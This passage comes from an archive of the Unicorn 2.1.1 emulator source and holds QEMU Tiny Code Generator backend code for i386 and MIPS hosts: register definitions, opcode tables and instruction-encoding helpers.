2, /* DW_CFA_offset, %ebp, -8 */ 0x83, 3, /* DW_CFA_offset, %ebx, -12 */ 0x86, 4, /* DW_CFA_offset, %esi, -16 */ 0x87, 5, /* DW_CFA_offset, %edi, -20 */ } }; #endif #if defined(ELF_HOST_MACHINE) void tcg_register_jit(TCGContext *s, void *buf, size_t buf_size) { tcg_register_jit_int(s, buf, buf_size, &debug_frame, sizeof(debug_frame)); } #endif �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/tcg/i386/tcg-target.opc.h��������������������������������������������������������0000664�0000000�0000000�00000003162�14675241067�0020415�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Copyright (c) 2019 Linaro * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. * * Target-specific opcodes for host vector expansion. These will be * emitted by tcg_expand_vec_op. For those familiar with GCC internals, * consider these to be UNSPEC with names. */ DEF(x86_shufps_vec, 1, 2, 1, IMPLVEC) DEF(x86_vpblendvb_vec, 1, 3, 0, IMPLVEC) DEF(x86_blend_vec, 1, 2, 1, IMPLVEC) DEF(x86_packss_vec, 1, 2, 0, IMPLVEC) DEF(x86_packus_vec, 1, 2, 0, IMPLVEC) DEF(x86_psrldq_vec, 1, 1, 1, IMPLVEC) DEF(x86_vperm2i128_vec, 1, 2, 1, IMPLVEC) DEF(x86_punpckl_vec, 1, 2, 0, IMPLVEC) DEF(x86_punpckh_vec, 1, 2, 0, IMPLVEC) ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/tcg/mips/������������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0015700�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/tcg/mips/tcg-target.h������������������������������������������������������������0000664�0000000�0000000�00000016535�14675241067�0020124�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Tiny Code Generator for QEMU * * Copyright (c) 2008-2009 Arnaud Patard <arnaud.patard@rtp-net.org> * Copyright (c) 2009 Aurelien Jarno <aurelien@aurel32.net> * Based on i386/tcg-target.c - Copyright (c) 2008 Fabrice Bellard * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #ifndef MIPS_TCG_TARGET_H #define MIPS_TCG_TARGET_H #if _MIPS_SIM == _ABIO32 # define TCG_TARGET_REG_BITS 32 #elif _MIPS_SIM == _ABIN32 || _MIPS_SIM == _ABI64 # define TCG_TARGET_REG_BITS 64 #else # error "Unknown ABI" #endif #define TCG_TARGET_INSN_UNIT_SIZE 4 #define TCG_TARGET_TLB_DISPLACEMENT_BITS 16 #define TCG_TARGET_NB_REGS 32 typedef enum { TCG_REG_ZERO = 0, TCG_REG_AT, TCG_REG_V0, TCG_REG_V1, TCG_REG_A0, TCG_REG_A1, TCG_REG_A2, TCG_REG_A3, TCG_REG_T0, TCG_REG_T1, TCG_REG_T2, TCG_REG_T3, TCG_REG_T4, TCG_REG_T5, TCG_REG_T6, TCG_REG_T7, TCG_REG_S0, TCG_REG_S1, TCG_REG_S2, TCG_REG_S3, TCG_REG_S4, TCG_REG_S5, TCG_REG_S6, TCG_REG_S7, TCG_REG_T8, TCG_REG_T9, TCG_REG_K0, TCG_REG_K1, TCG_REG_GP, TCG_REG_SP, TCG_REG_S8, TCG_REG_RA, TCG_REG_CALL_STACK = TCG_REG_SP, TCG_AREG0 = TCG_REG_S0, } TCGReg; /* used for function call generation */ #define TCG_TARGET_STACK_ALIGN 16 #if _MIPS_SIM == _ABIO32 # define TCG_TARGET_CALL_STACK_OFFSET 16 #else # define TCG_TARGET_CALL_STACK_OFFSET 0 #endif #define TCG_TARGET_CALL_ALIGN_ARGS 1 /* MOVN/MOVZ instructions detection */ #if (defined(__mips_isa_rev) && (__mips_isa_rev >= 1)) || \ defined(_MIPS_ARCH_LOONGSON2E) || defined(_MIPS_ARCH_LOONGSON2F) || \ defined(_MIPS_ARCH_MIPS4) #define use_movnz_instructions 1 #else extern bool use_movnz_instructions; #endif /* MIPS32 instruction set detection */ #if defined(__mips_isa_rev) && (__mips_isa_rev >= 1) #define use_mips32_instructions 1 #else extern bool use_mips32_instructions; #endif /* MIPS32R2 instruction set detection */ #if defined(__mips_isa_rev) && (__mips_isa_rev >= 2) #define use_mips32r2_instructions 1 #else extern bool use_mips32r2_instructions; #endif /* MIPS32R6 instruction set detection */ #if defined(__mips_isa_rev) && (__mips_isa_rev >= 6) #define use_mips32r6_instructions 1 #else #define use_mips32r6_instructions 0 #endif /* optional instructions */ #define TCG_TARGET_HAS_div_i32 1 #define TCG_TARGET_HAS_rem_i32 1 #define TCG_TARGET_HAS_not_i32 1 #define TCG_TARGET_HAS_nor_i32 1 #define TCG_TARGET_HAS_andc_i32 0 #define TCG_TARGET_HAS_orc_i32 0 #define TCG_TARGET_HAS_eqv_i32 0 #define TCG_TARGET_HAS_nand_i32 0 #define TCG_TARGET_HAS_mulu2_i32 (!use_mips32r6_instructions) #define TCG_TARGET_HAS_muls2_i32 (!use_mips32r6_instructions) #define TCG_TARGET_HAS_muluh_i32 1 #define TCG_TARGET_HAS_mulsh_i32 1 #define TCG_TARGET_HAS_bswap32_i32 1 #define TCG_TARGET_HAS_goto_ptr 1 #define TCG_TARGET_HAS_direct_jump 1 #if TCG_TARGET_REG_BITS == 64 #define TCG_TARGET_HAS_add2_i32 0 #define TCG_TARGET_HAS_sub2_i32 0 #define TCG_TARGET_HAS_extrl_i64_i32 1 #define TCG_TARGET_HAS_extrh_i64_i32 1 #define TCG_TARGET_HAS_div_i64 1 #define TCG_TARGET_HAS_rem_i64 1 #define TCG_TARGET_HAS_not_i64 1 #define TCG_TARGET_HAS_nor_i64 1 #define TCG_TARGET_HAS_andc_i64 0 #define TCG_TARGET_HAS_orc_i64 0 #define TCG_TARGET_HAS_eqv_i64 0 #define TCG_TARGET_HAS_nand_i64 0 #define TCG_TARGET_HAS_add2_i64 0 #define TCG_TARGET_HAS_sub2_i64 0 #define TCG_TARGET_HAS_mulu2_i64 (!use_mips32r6_instructions) #define TCG_TARGET_HAS_muls2_i64 (!use_mips32r6_instructions) #define TCG_TARGET_HAS_muluh_i64 1 #define TCG_TARGET_HAS_mulsh_i64 1 #define TCG_TARGET_HAS_ext32s_i64 1 #define TCG_TARGET_HAS_ext32u_i64 1 #endif /* optional instructions detected at runtime */ #define TCG_TARGET_HAS_movcond_i32 use_movnz_instructions #define TCG_TARGET_HAS_bswap16_i32 use_mips32r2_instructions #define TCG_TARGET_HAS_deposit_i32 use_mips32r2_instructions #define TCG_TARGET_HAS_extract_i32 use_mips32r2_instructions #define TCG_TARGET_HAS_sextract_i32 0 #define TCG_TARGET_HAS_extract2_i32 0 #define TCG_TARGET_HAS_ext8s_i32 use_mips32r2_instructions #define TCG_TARGET_HAS_ext16s_i32 use_mips32r2_instructions #define TCG_TARGET_HAS_rot_i32 use_mips32r2_instructions #define TCG_TARGET_HAS_clz_i32 use_mips32r2_instructions #define TCG_TARGET_HAS_ctz_i32 0 #define TCG_TARGET_HAS_ctpop_i32 0 #if TCG_TARGET_REG_BITS == 64 #define TCG_TARGET_HAS_movcond_i64 use_movnz_instructions #define TCG_TARGET_HAS_bswap16_i64 use_mips32r2_instructions #define TCG_TARGET_HAS_bswap32_i64 use_mips32r2_instructions #define TCG_TARGET_HAS_bswap64_i64 use_mips32r2_instructions #define TCG_TARGET_HAS_deposit_i64 use_mips32r2_instructions #define TCG_TARGET_HAS_extract_i64 use_mips32r2_instructions #define TCG_TARGET_HAS_sextract_i64 0 #define TCG_TARGET_HAS_extract2_i64 0 #define TCG_TARGET_HAS_ext8s_i64 use_mips32r2_instructions #define TCG_TARGET_HAS_ext16s_i64 use_mips32r2_instructions #define TCG_TARGET_HAS_rot_i64 use_mips32r2_instructions #define TCG_TARGET_HAS_clz_i64 use_mips32r2_instructions #define TCG_TARGET_HAS_ctz_i64 0 #define TCG_TARGET_HAS_ctpop_i64 0 #endif /* optional instructions automatically implemented */ #define TCG_TARGET_HAS_neg_i32 0 /* sub rd, zero, rt */ #define TCG_TARGET_HAS_ext8u_i32 0 /* andi rt, rs, 0xff */ #define TCG_TARGET_HAS_ext16u_i32 0 /* andi rt, rs, 0xffff */ #if TCG_TARGET_REG_BITS == 64 #define TCG_TARGET_HAS_neg_i64 0 /* sub rd, zero, rt */ #define TCG_TARGET_HAS_ext8u_i64 0 /* andi rt, rs, 0xff */ #define TCG_TARGET_HAS_ext16u_i64 0 /* andi rt, rs, 0xffff */ #endif #ifdef __OpenBSD__ #include <machine/sysarch.h> #else #include <sys/cachectl.h> #endif #define TCG_TARGET_DEFAULT_MO (0) #define TCG_TARGET_HAS_MEMORY_BSWAP 1 static inline void flush_icache_range(uintptr_t start, uintptr_t stop) { cacheflush ((void *)start, stop-start, ICACHE); } void tb_target_set_jmp_target(uintptr_t, uintptr_t, uintptr_t); #ifdef CONFIG_SOFTMMU #define TCG_TARGET_NEED_LDST_LABELS #endif #endif �������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/tcg/mips/tcg-target.inc.c��������������������������������������������������������0000664�0000000�0000000�00000247165�14675241067�0020674�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Tiny Code Generator for QEMU * * Copyright (c) 2008-2009 Arnaud Patard <arnaud.patard@rtp-net.org> * Copyright (c) 2009 Aurelien Jarno <aurelien@aurel32.net> * Based on i386/tcg-target.c - Copyright (c) 2008 Fabrice Bellard * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #ifdef HOST_WORDS_BIGENDIAN # define MIPS_BE 1 #else # define MIPS_BE 0 #endif #if TCG_TARGET_REG_BITS == 32 # define LO_OFF (MIPS_BE * 4) # define HI_OFF (4 - LO_OFF) #else /* To assert at compile-time that these values are never used for TCG_TARGET_REG_BITS == 64. */ int link_error(void); # define LO_OFF link_error() # define HI_OFF link_error() #endif #ifdef CONFIG_DEBUG_TCG static const char * const tcg_target_reg_names[TCG_TARGET_NB_REGS] = { "zero", "at", "v0", "v1", "a0", "a1", "a2", "a3", "t0", "t1", "t2", "t3", "t4", "t5", "t6", "t7", "s0", "s1", "s2", "s3", "s4", "s5", "s6", "s7", "t8", "t9", "k0", "k1", "gp", "sp", "s8", "ra", }; #endif #define TCG_TMP0 TCG_REG_AT #define TCG_TMP1 TCG_REG_T9 #define TCG_TMP2 TCG_REG_T8 #define TCG_TMP3 TCG_REG_T7 #ifndef CONFIG_SOFTMMU #define TCG_GUEST_BASE_REG TCG_REG_S1 #endif /* check if we really need so many registers :P */ static const int tcg_target_reg_alloc_order[] = { /* Call saved registers. */ TCG_REG_S0, TCG_REG_S1, TCG_REG_S2, TCG_REG_S3, TCG_REG_S4, TCG_REG_S5, TCG_REG_S6, TCG_REG_S7, TCG_REG_S8, /* Call clobbered registers. */ TCG_REG_T4, TCG_REG_T5, TCG_REG_T6, TCG_REG_T7, TCG_REG_T8, TCG_REG_T9, TCG_REG_V1, TCG_REG_V0, /* Argument registers, opposite order of allocation. */ TCG_REG_T3, TCG_REG_T2, TCG_REG_T1, TCG_REG_T0, TCG_REG_A3, TCG_REG_A2, TCG_REG_A1, TCG_REG_A0, }; static const TCGReg tcg_target_call_iarg_regs[] = { TCG_REG_A0, TCG_REG_A1, TCG_REG_A2, TCG_REG_A3, #if _MIPS_SIM == _ABIN32 || _MIPS_SIM == _ABI64 TCG_REG_T0, TCG_REG_T1, TCG_REG_T2, TCG_REG_T3, #endif }; static const TCGReg tcg_target_call_oarg_regs[2] = { TCG_REG_V0, TCG_REG_V1 }; static tcg_insn_unit *tb_ret_addr; static tcg_insn_unit *bswap32_addr; static tcg_insn_unit *bswap32u_addr; static tcg_insn_unit *bswap64_addr; static inline uint32_t reloc_pc16_val(tcg_insn_unit *pc, tcg_insn_unit *target) { /* Let the compiler perform the right-shift as part of the arithmetic. */ ptrdiff_t disp = target - (pc + 1); tcg_debug_assert(disp == (int16_t)disp); return disp & 0xffff; } static inline void reloc_pc16(tcg_insn_unit *pc, tcg_insn_unit *target) { *pc = deposit32(*pc, 0, 16, reloc_pc16_val(pc, target)); } static inline uint32_t reloc_26_val(tcg_insn_unit *pc, tcg_insn_unit *target) { tcg_debug_assert((((uintptr_t)pc ^ (uintptr_t)target) & 0xf0000000) == 0); return ((uintptr_t)target >> 2) & 0x3ffffff; } static inline void reloc_26(tcg_insn_unit *pc, tcg_insn_unit *target) { *pc = deposit32(*pc, 0, 26, reloc_26_val(pc, target)); } static bool patch_reloc(tcg_insn_unit *code_ptr, int type, intptr_t value, intptr_t addend) { tcg_debug_assert(type == R_MIPS_PC16); tcg_debug_assert(addend == 0); reloc_pc16(code_ptr, (tcg_insn_unit *)value); return true; } #define TCG_CT_CONST_ZERO 0x100 #define TCG_CT_CONST_U16 0x200 /* Unsigned 16-bit: 0 - 0xffff. */ #define TCG_CT_CONST_S16 0x400 /* Signed 16-bit: -32768 - 32767 */ #define TCG_CT_CONST_P2M1 0x800 /* Power of 2 minus 1. */ #define TCG_CT_CONST_N16 0x1000 /* "Negatable" 16-bit: -32767 - 32767 */ #define TCG_CT_CONST_WSZ 0x2000 /* word size */ static inline bool is_p2m1(tcg_target_long val) { return val && ((val + 1) & val) == 0; } /* parse target specific constraints */ static const char *target_parse_constraint(TCGArgConstraint *ct, const char *ct_str, TCGType type) { switch(*ct_str++) { case 'r': ct->ct |= TCG_CT_REG; ct->u.regs = 0xffffffff; break; case 'L': /* qemu_ld input arg constraint */ ct->ct |= TCG_CT_REG; ct->u.regs = 0xffffffff; tcg_regset_reset_reg(ct->u.regs, TCG_REG_A0); #if defined(CONFIG_SOFTMMU) if (TCG_TARGET_REG_BITS < TARGET_LONG_BITS) { tcg_regset_reset_reg(ct->u.regs, TCG_REG_A2); } #endif break; case 'S': /* qemu_st constraint */ ct->ct |= TCG_CT_REG; ct->u.regs = 0xffffffff; tcg_regset_reset_reg(ct->u.regs, TCG_REG_A0); #if defined(CONFIG_SOFTMMU) if (TCG_TARGET_REG_BITS < TARGET_LONG_BITS) { tcg_regset_reset_reg(ct->u.regs, TCG_REG_A2); tcg_regset_reset_reg(ct->u.regs, TCG_REG_A3); } else { tcg_regset_reset_reg(ct->u.regs, TCG_REG_A1); } #endif break; case 'I': ct->ct |= TCG_CT_CONST_U16; break; case 'J': ct->ct |= TCG_CT_CONST_S16; break; case 'K': ct->ct |= TCG_CT_CONST_P2M1; break; case 'N': ct->ct |= TCG_CT_CONST_N16; break; case 'W': ct->ct |= TCG_CT_CONST_WSZ; break; case 'Z': /* We are cheating a bit here, using the fact that the register ZERO is also the register number 0. Hence there is no need to check for const_args in each instruction. */ ct->ct |= TCG_CT_CONST_ZERO; break; default: return NULL; } return ct_str; } /* test if a constant matches the constraint */ static inline int tcg_target_const_match(tcg_target_long val, TCGType type, const TCGArgConstraint *arg_ct) { int ct; ct = arg_ct->ct; if (ct & TCG_CT_CONST) { return 1; } else if ((ct & TCG_CT_CONST_ZERO) && val == 0) { return 1; } else if ((ct & TCG_CT_CONST_U16) && val == (uint16_t)val) { return 1; } else if ((ct & TCG_CT_CONST_S16) && val == (int16_t)val) { return 1; } else if ((ct & TCG_CT_CONST_N16) && val >= -32767 && val <= 32767) { return 1; } else if ((ct & TCG_CT_CONST_P2M1) && use_mips32r2_instructions && is_p2m1(val)) { return 1; } else if ((ct & TCG_CT_CONST_WSZ) && val == (type == TCG_TYPE_I32 ? 32 : 64)) { return 1; } return 0; } /* instruction opcodes */ typedef enum { OPC_J = 002 << 26, OPC_JAL = 003 << 26, OPC_BEQ = 004 << 26, OPC_BNE = 005 << 26, OPC_BLEZ = 006 << 26, OPC_BGTZ = 007 << 26, OPC_ADDIU = 011 << 26, OPC_SLTI = 012 << 26, OPC_SLTIU = 013 << 26, OPC_ANDI = 014 << 26, OPC_ORI = 015 << 26, OPC_XORI = 016 << 26, OPC_LUI = 017 << 26, OPC_DADDIU = 031 << 26, OPC_LB = 040 << 26, OPC_LH = 041 << 26, OPC_LW = 043 << 26, OPC_LBU = 044 << 26, OPC_LHU = 045 << 26, OPC_LWU = 047 << 26, OPC_SB = 050 << 26, OPC_SH = 051 << 26, OPC_SW = 053 << 26, OPC_LD = 067 << 26, OPC_SD = 077 << 26, OPC_SPECIAL = 000 << 26, OPC_SLL = OPC_SPECIAL | 000, OPC_SRL = OPC_SPECIAL | 002, OPC_ROTR = OPC_SPECIAL | 002 | (1 << 21), OPC_SRA = OPC_SPECIAL | 003, OPC_SLLV = OPC_SPECIAL | 004, OPC_SRLV = OPC_SPECIAL | 006, OPC_ROTRV = OPC_SPECIAL | 006 | 0100, OPC_SRAV = OPC_SPECIAL | 007, OPC_JR_R5 = OPC_SPECIAL | 010, OPC_JALR = OPC_SPECIAL | 011, OPC_MOVZ = OPC_SPECIAL | 012, OPC_MOVN = OPC_SPECIAL | 013, OPC_SYNC = OPC_SPECIAL | 017, OPC_MFHI = OPC_SPECIAL | 020, OPC_MFLO = OPC_SPECIAL | 022, OPC_DSLLV = OPC_SPECIAL | 024, OPC_DSRLV = OPC_SPECIAL | 026, OPC_DROTRV = OPC_SPECIAL | 026 | 0100, OPC_DSRAV = OPC_SPECIAL | 027, OPC_MULT = OPC_SPECIAL | 030, OPC_MUL_R6 = OPC_SPECIAL | 030 | 0200, OPC_MUH = OPC_SPECIAL | 030 | 0300, OPC_MULTU = OPC_SPECIAL | 031, OPC_MULU = OPC_SPECIAL | 031 | 0200, OPC_MUHU = OPC_SPECIAL | 031 | 0300, OPC_DIV = OPC_SPECIAL | 032, OPC_DIV_R6 = OPC_SPECIAL | 032 | 0200, OPC_MOD = OPC_SPECIAL | 032 | 0300, OPC_DIVU = OPC_SPECIAL | 033, OPC_DIVU_R6 = OPC_SPECIAL | 033 | 0200, OPC_MODU = OPC_SPECIAL | 033 | 0300, OPC_DMULT = OPC_SPECIAL | 034, OPC_DMUL = OPC_SPECIAL | 034 | 0200, OPC_DMUH = OPC_SPECIAL | 034 | 0300, OPC_DMULTU = OPC_SPECIAL | 035, OPC_DMULU = OPC_SPECIAL | 035 | 0200, OPC_DMUHU = OPC_SPECIAL | 035 | 0300, OPC_DDIV = OPC_SPECIAL | 036, OPC_DDIV_R6 = OPC_SPECIAL | 036 | 0200, OPC_DMOD = OPC_SPECIAL | 036 | 0300, OPC_DDIVU = OPC_SPECIAL | 037, OPC_DDIVU_R6 = OPC_SPECIAL | 037 | 0200, OPC_DMODU = OPC_SPECIAL | 037 | 0300, OPC_ADDU = OPC_SPECIAL | 041, OPC_SUBU = OPC_SPECIAL | 043, OPC_AND = OPC_SPECIAL | 044, OPC_OR = OPC_SPECIAL | 045, OPC_XOR = OPC_SPECIAL | 046, OPC_NOR = OPC_SPECIAL | 047, OPC_SLT = OPC_SPECIAL | 052, OPC_SLTU = OPC_SPECIAL | 053, OPC_DADDU = OPC_SPECIAL | 055, OPC_DSUBU = OPC_SPECIAL | 057, OPC_SELEQZ = OPC_SPECIAL | 065, OPC_SELNEZ = OPC_SPECIAL | 067, OPC_DSLL = OPC_SPECIAL | 070, OPC_DSRL = OPC_SPECIAL | 072, OPC_DROTR = OPC_SPECIAL | 072 | (1 << 21), OPC_DSRA = OPC_SPECIAL | 073, OPC_DSLL32 = OPC_SPECIAL | 074, OPC_DSRL32 = OPC_SPECIAL | 076, OPC_DROTR32 = OPC_SPECIAL | 076 | (1 << 21), OPC_DSRA32 = OPC_SPECIAL | 077, OPC_CLZ_R6 = OPC_SPECIAL | 0120, OPC_DCLZ_R6 = OPC_SPECIAL | 0122, OPC_REGIMM = 001 << 26, OPC_BLTZ = OPC_REGIMM | (000 << 16), OPC_BGEZ = OPC_REGIMM | (001 << 16), OPC_SPECIAL2 = 034 << 26, OPC_MUL_R5 = OPC_SPECIAL2 | 002, OPC_CLZ = OPC_SPECIAL2 | 040, OPC_DCLZ = OPC_SPECIAL2 | 044, OPC_SPECIAL3 = 037 << 26, OPC_EXT = OPC_SPECIAL3 | 000, OPC_DEXTM = OPC_SPECIAL3 | 001, OPC_DEXTU = OPC_SPECIAL3 | 002, OPC_DEXT = OPC_SPECIAL3 | 003, OPC_INS = OPC_SPECIAL3 | 004, OPC_DINSM = OPC_SPECIAL3 | 005, OPC_DINSU = OPC_SPECIAL3 | 006, OPC_DINS = OPC_SPECIAL3 | 007, OPC_WSBH = OPC_SPECIAL3 | 00240, OPC_DSBH = OPC_SPECIAL3 | 00244, OPC_DSHD = OPC_SPECIAL3 | 00544, OPC_SEB = OPC_SPECIAL3 | 02040, OPC_SEH = OPC_SPECIAL3 | 03040, /* MIPS r6 doesn't have JR, JALR should be used instead */ OPC_JR = use_mips32r6_instructions ? OPC_JALR : OPC_JR_R5, /* * MIPS r6 replaces MUL with an alternative encoding which is * backwards-compatible at the assembly level. */ OPC_MUL = use_mips32r6_instructions ? OPC_MUL_R6 : OPC_MUL_R5, /* MIPS r6 introduced names for weaker variants of SYNC. These are backward compatible to previous architecture revisions. */ OPC_SYNC_WMB = OPC_SYNC | 0x04 << 6, OPC_SYNC_MB = OPC_SYNC | 0x10 << 6, OPC_SYNC_ACQUIRE = OPC_SYNC | 0x11 << 6, OPC_SYNC_RELEASE = OPC_SYNC | 0x12 << 6, OPC_SYNC_RMB = OPC_SYNC | 0x13 << 6, /* Aliases for convenience. */ ALIAS_PADD = sizeof(void *) == 4 ? OPC_ADDU : OPC_DADDU, ALIAS_PADDI = sizeof(void *) == 4 ? OPC_ADDIU : OPC_DADDIU, ALIAS_TSRL = TARGET_LONG_BITS == 32 || TCG_TARGET_REG_BITS == 32 ? OPC_SRL : OPC_DSRL, } MIPSInsn; /* * Type reg */ static inline void tcg_out_opc_reg(TCGContext *s, MIPSInsn opc, TCGReg rd, TCGReg rs, TCGReg rt) { int32_t inst; inst = opc; inst |= (rs & 0x1F) << 21; inst |= (rt & 0x1F) << 16; inst |= (rd & 0x1F) << 11; tcg_out32(s, inst); } /* * Type immediate */ static inline void tcg_out_opc_imm(TCGContext *s, MIPSInsn opc, TCGReg rt, TCGReg rs, TCGArg imm) { int32_t inst; inst = opc; inst |= (rs & 0x1F) << 21; inst |= (rt & 0x1F) << 16; inst |= (imm & 0xffff); tcg_out32(s, inst); } /* * Type bitfield */ static inline void tcg_out_opc_bf(TCGContext *s, MIPSInsn opc, TCGReg rt, TCGReg rs, int msb, int lsb) { int32_t inst; inst = opc; inst |= (rs & 0x1F) << 21; inst |= (rt & 0x1F) << 16; inst |= (msb & 0x1F) << 11; inst |= (lsb & 0x1F) << 6; tcg_out32(s, inst); } static inline void tcg_out_opc_bf64(TCGContext *s, MIPSInsn opc, MIPSInsn opm, MIPSInsn oph, TCGReg rt, TCGReg rs, int msb, int lsb) { if (lsb >= 32) { opc = oph; msb -= 32; lsb -= 32; } else if (msb >= 32) { opc = opm; msb -= 32; } tcg_out_opc_bf(s, opc, rt, rs, msb, lsb); } /* * Type branch */ static inline void tcg_out_opc_br(TCGContext *s, MIPSInsn opc, TCGReg rt, TCGReg rs) { tcg_out_opc_imm(s, opc, rt, rs, 0); } /* * Type sa */ static inline void tcg_out_opc_sa(TCGContext *s, MIPSInsn opc, TCGReg rd, TCGReg rt, TCGArg sa) { int32_t inst; inst = opc; inst |= (rt & 0x1F) << 16; inst |= (rd & 0x1F) << 11; inst |= (sa & 0x1F) << 6; tcg_out32(s, inst); } static void tcg_out_opc_sa64(TCGContext *s, MIPSInsn opc1, MIPSInsn opc2, TCGReg rd, TCGReg rt, TCGArg sa) { int32_t inst; inst = (sa & 32 ? opc2 : opc1); inst |= (rt & 0x1F) << 16; inst |= (rd & 0x1F) << 11; inst |= (sa & 0x1F) << 6; tcg_out32(s, inst); } /* * Type jump. * Returns true if the branch was in range and the insn was emitted. */ static bool tcg_out_opc_jmp(TCGContext *s, MIPSInsn opc, void *target) { uintptr_t dest = (uintptr_t)target; uintptr_t from = (uintptr_t)s->code_ptr + 4; int32_t inst; /* The pc-region branch happens within the 256MB region of the delay slot (thus the +4). */ if ((from ^ dest) & -(1 << 28)) { return false; } tcg_debug_assert((dest & 3) == 0); inst = opc; inst |= (dest >> 2) & 0x3ffffff; tcg_out32(s, inst); return true; } static inline void tcg_out_nop(TCGContext *s) { tcg_out32(s, 0); } static inline void tcg_out_dsll(TCGContext *s, TCGReg rd, TCGReg rt, TCGArg sa) { tcg_out_opc_sa64(s, OPC_DSLL, OPC_DSLL32, rd, rt, sa); } static inline void tcg_out_dsrl(TCGContext *s, TCGReg rd, TCGReg rt, TCGArg sa) { tcg_out_opc_sa64(s, OPC_DSRL, OPC_DSRL32, rd, rt, sa); } static inline void tcg_out_dsra(TCGContext *s, TCGReg rd, TCGReg rt, TCGArg sa) { tcg_out_opc_sa64(s, OPC_DSRA, OPC_DSRA32, rd, rt, sa); } static inline bool tcg_out_mov(TCGContext *s, TCGType type, TCGReg ret, TCGReg arg) { /* Simple reg-reg move, optimising out the 'do nothing' case */ if (ret != arg) { tcg_out_opc_reg(s, OPC_OR, ret, arg, TCG_REG_ZERO); } return true; } static void tcg_out_movi(TCGContext *s, TCGType type, TCGReg ret, tcg_target_long arg) { if (TCG_TARGET_REG_BITS == 64 && type == TCG_TYPE_I32) { arg = (int32_t)arg; } if (arg == (int16_t)arg) { tcg_out_opc_imm(s, OPC_ADDIU, ret, TCG_REG_ZERO, arg); return; } if (arg == (uint16_t)arg) { tcg_out_opc_imm(s, OPC_ORI, ret, TCG_REG_ZERO, arg); return; } if (TCG_TARGET_REG_BITS == 32 || arg == (int32_t)arg) { tcg_out_opc_imm(s, OPC_LUI, ret, TCG_REG_ZERO, arg >> 16); } else { tcg_out_movi(s, TCG_TYPE_I32, ret, arg >> 31 >> 1); if (arg & 0xffff0000ull) { tcg_out_dsll(s, ret, ret, 16); tcg_out_opc_imm(s, OPC_ORI, ret, ret, arg >> 16); tcg_out_dsll(s, ret, ret, 16); } else { tcg_out_dsll(s, ret, ret, 32); } } if (arg & 0xffff) { tcg_out_opc_imm(s, OPC_ORI, ret, ret, arg & 0xffff); } } static inline void tcg_out_bswap16(TCGContext *s, TCGReg ret, TCGReg arg) { if (use_mips32r2_instructions) { tcg_out_opc_reg(s, OPC_WSBH, ret, 0, arg); } else { /* ret and arg can't be register at */ if (ret == TCG_TMP0 || arg == TCG_TMP0) { tcg_abort(); } tcg_out_opc_sa(s, OPC_SRL, TCG_TMP0, arg, 8); tcg_out_opc_sa(s, OPC_SLL, ret, arg, 8); tcg_out_opc_imm(s, OPC_ANDI, ret, ret, 0xff00); tcg_out_opc_reg(s, OPC_OR, ret, ret, TCG_TMP0); } } static inline void 